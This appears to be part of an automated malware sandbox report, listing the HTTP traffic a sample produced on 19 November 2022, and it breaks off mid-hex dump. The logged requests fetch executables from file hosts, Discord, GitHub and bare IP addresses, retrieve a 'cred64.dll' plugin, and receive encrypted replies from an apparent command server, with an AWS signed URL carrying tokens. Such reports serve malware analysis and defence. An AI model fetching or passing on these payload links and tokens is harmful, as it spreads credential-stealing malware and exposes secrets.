                      Source: global trafficHTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                      Source: global trafficHTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
                      Source: global trafficHTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
                      Source: global trafficHTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
                      Source: global trafficHTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                      Source: global trafficHTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
                      Source: global trafficHTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
                      Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
                      Source: global trafficHTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
                      Source: global trafficHTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
                      Source: global trafficHTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:54 GMTServer: ApacheCache-Control: no-cache, privateUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:51 GMTServer: Apache/2.4.41 (Ubuntu)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 35 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 37Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e f8 91 ab fd b0 54 4a b3 dd 64 f8 f7 10 74 94 f2 83 Data Ascii: %S`Nh&WQY^TJdt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e2 93 b4 fa b1 1d 4c ae 9e 28 fa f7 52 68 93 e3 84 e1 75 Data Ascii: %S`Nh&WQY^L(Rhu
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 86 bb fa a5 15 45 a9 c4 22 fa f4 53 33 85 a5 88 f1 36 f0 85 88 b9 Data Ascii: %S`Nh&WQY^E"S36
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:04 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1b f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df ac 35 85 47 bd aa 20 25 c6 77 1e 8d 1a 3e e4 95 c1 4a d5 b3 18 c6 c7 93 b1 6f f0 5d 64 a2 99 c1 cf c1 e2 19 96 6c f3 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"5G %w>Jo]dl?
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:04 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 104Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e9 8a ac f7 a3 19 42 b9 c4 65 fa e8 1a 75 96 e6 89 f6 20 b2 8c 99 b2 7e b5 42 92 a3 47 69 cf 77 50 9a 4e 68 bf d6 96 5c d0 b0 1c df 95 c4 f3 35 a4 04 37 fe c5 ba ee e2 d0 30 a8 42 df 75 fa 80 b0 6c 04 70 0b 41 ca 42 87 51 52 ae 61 c1 11 9e 12 a8 4c 50 Data Ascii: %S`Nh&WQY^Beu ~BGiwPNh\570BulpABQRaLP
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 46Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 40 b2 d0 f6 a0 e0 54 18 e8 86 65 a4 ac 45 75 9c e3 87 bb 32 b1 8c 84 f2 68 b9 46 Data Ascii: %S`Nh&WQL@TeEu2hF
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 48Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 d5 f9 72 b4 a6 8a f3 4c ef 46 86 aa Data Ascii: %S`Nh&WQY^L8?rLF
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:14 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e3 8c ac f0 ba 1e 46 af c4 32 fe b4 1e 35 9c a5 93 f3 3b ae 91 9d e5 23 a4 5b 9b Data Ascii: %S`Nh&WQY^F25;#[
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:20 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:21 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 79Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 92 c7 2b 8c b9 b8 f3 3c f8 42 c9 f6 0c 7d db 77 57 8f 4a 65 e0 98 93 4b da fb 1e c9 90 cf e1 69 ff 0e 61 af 80 f3 b2 a3 c2 26 a1 Data Ascii: %S`Nh&WQY^L8?+<B}wWJeKia&
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 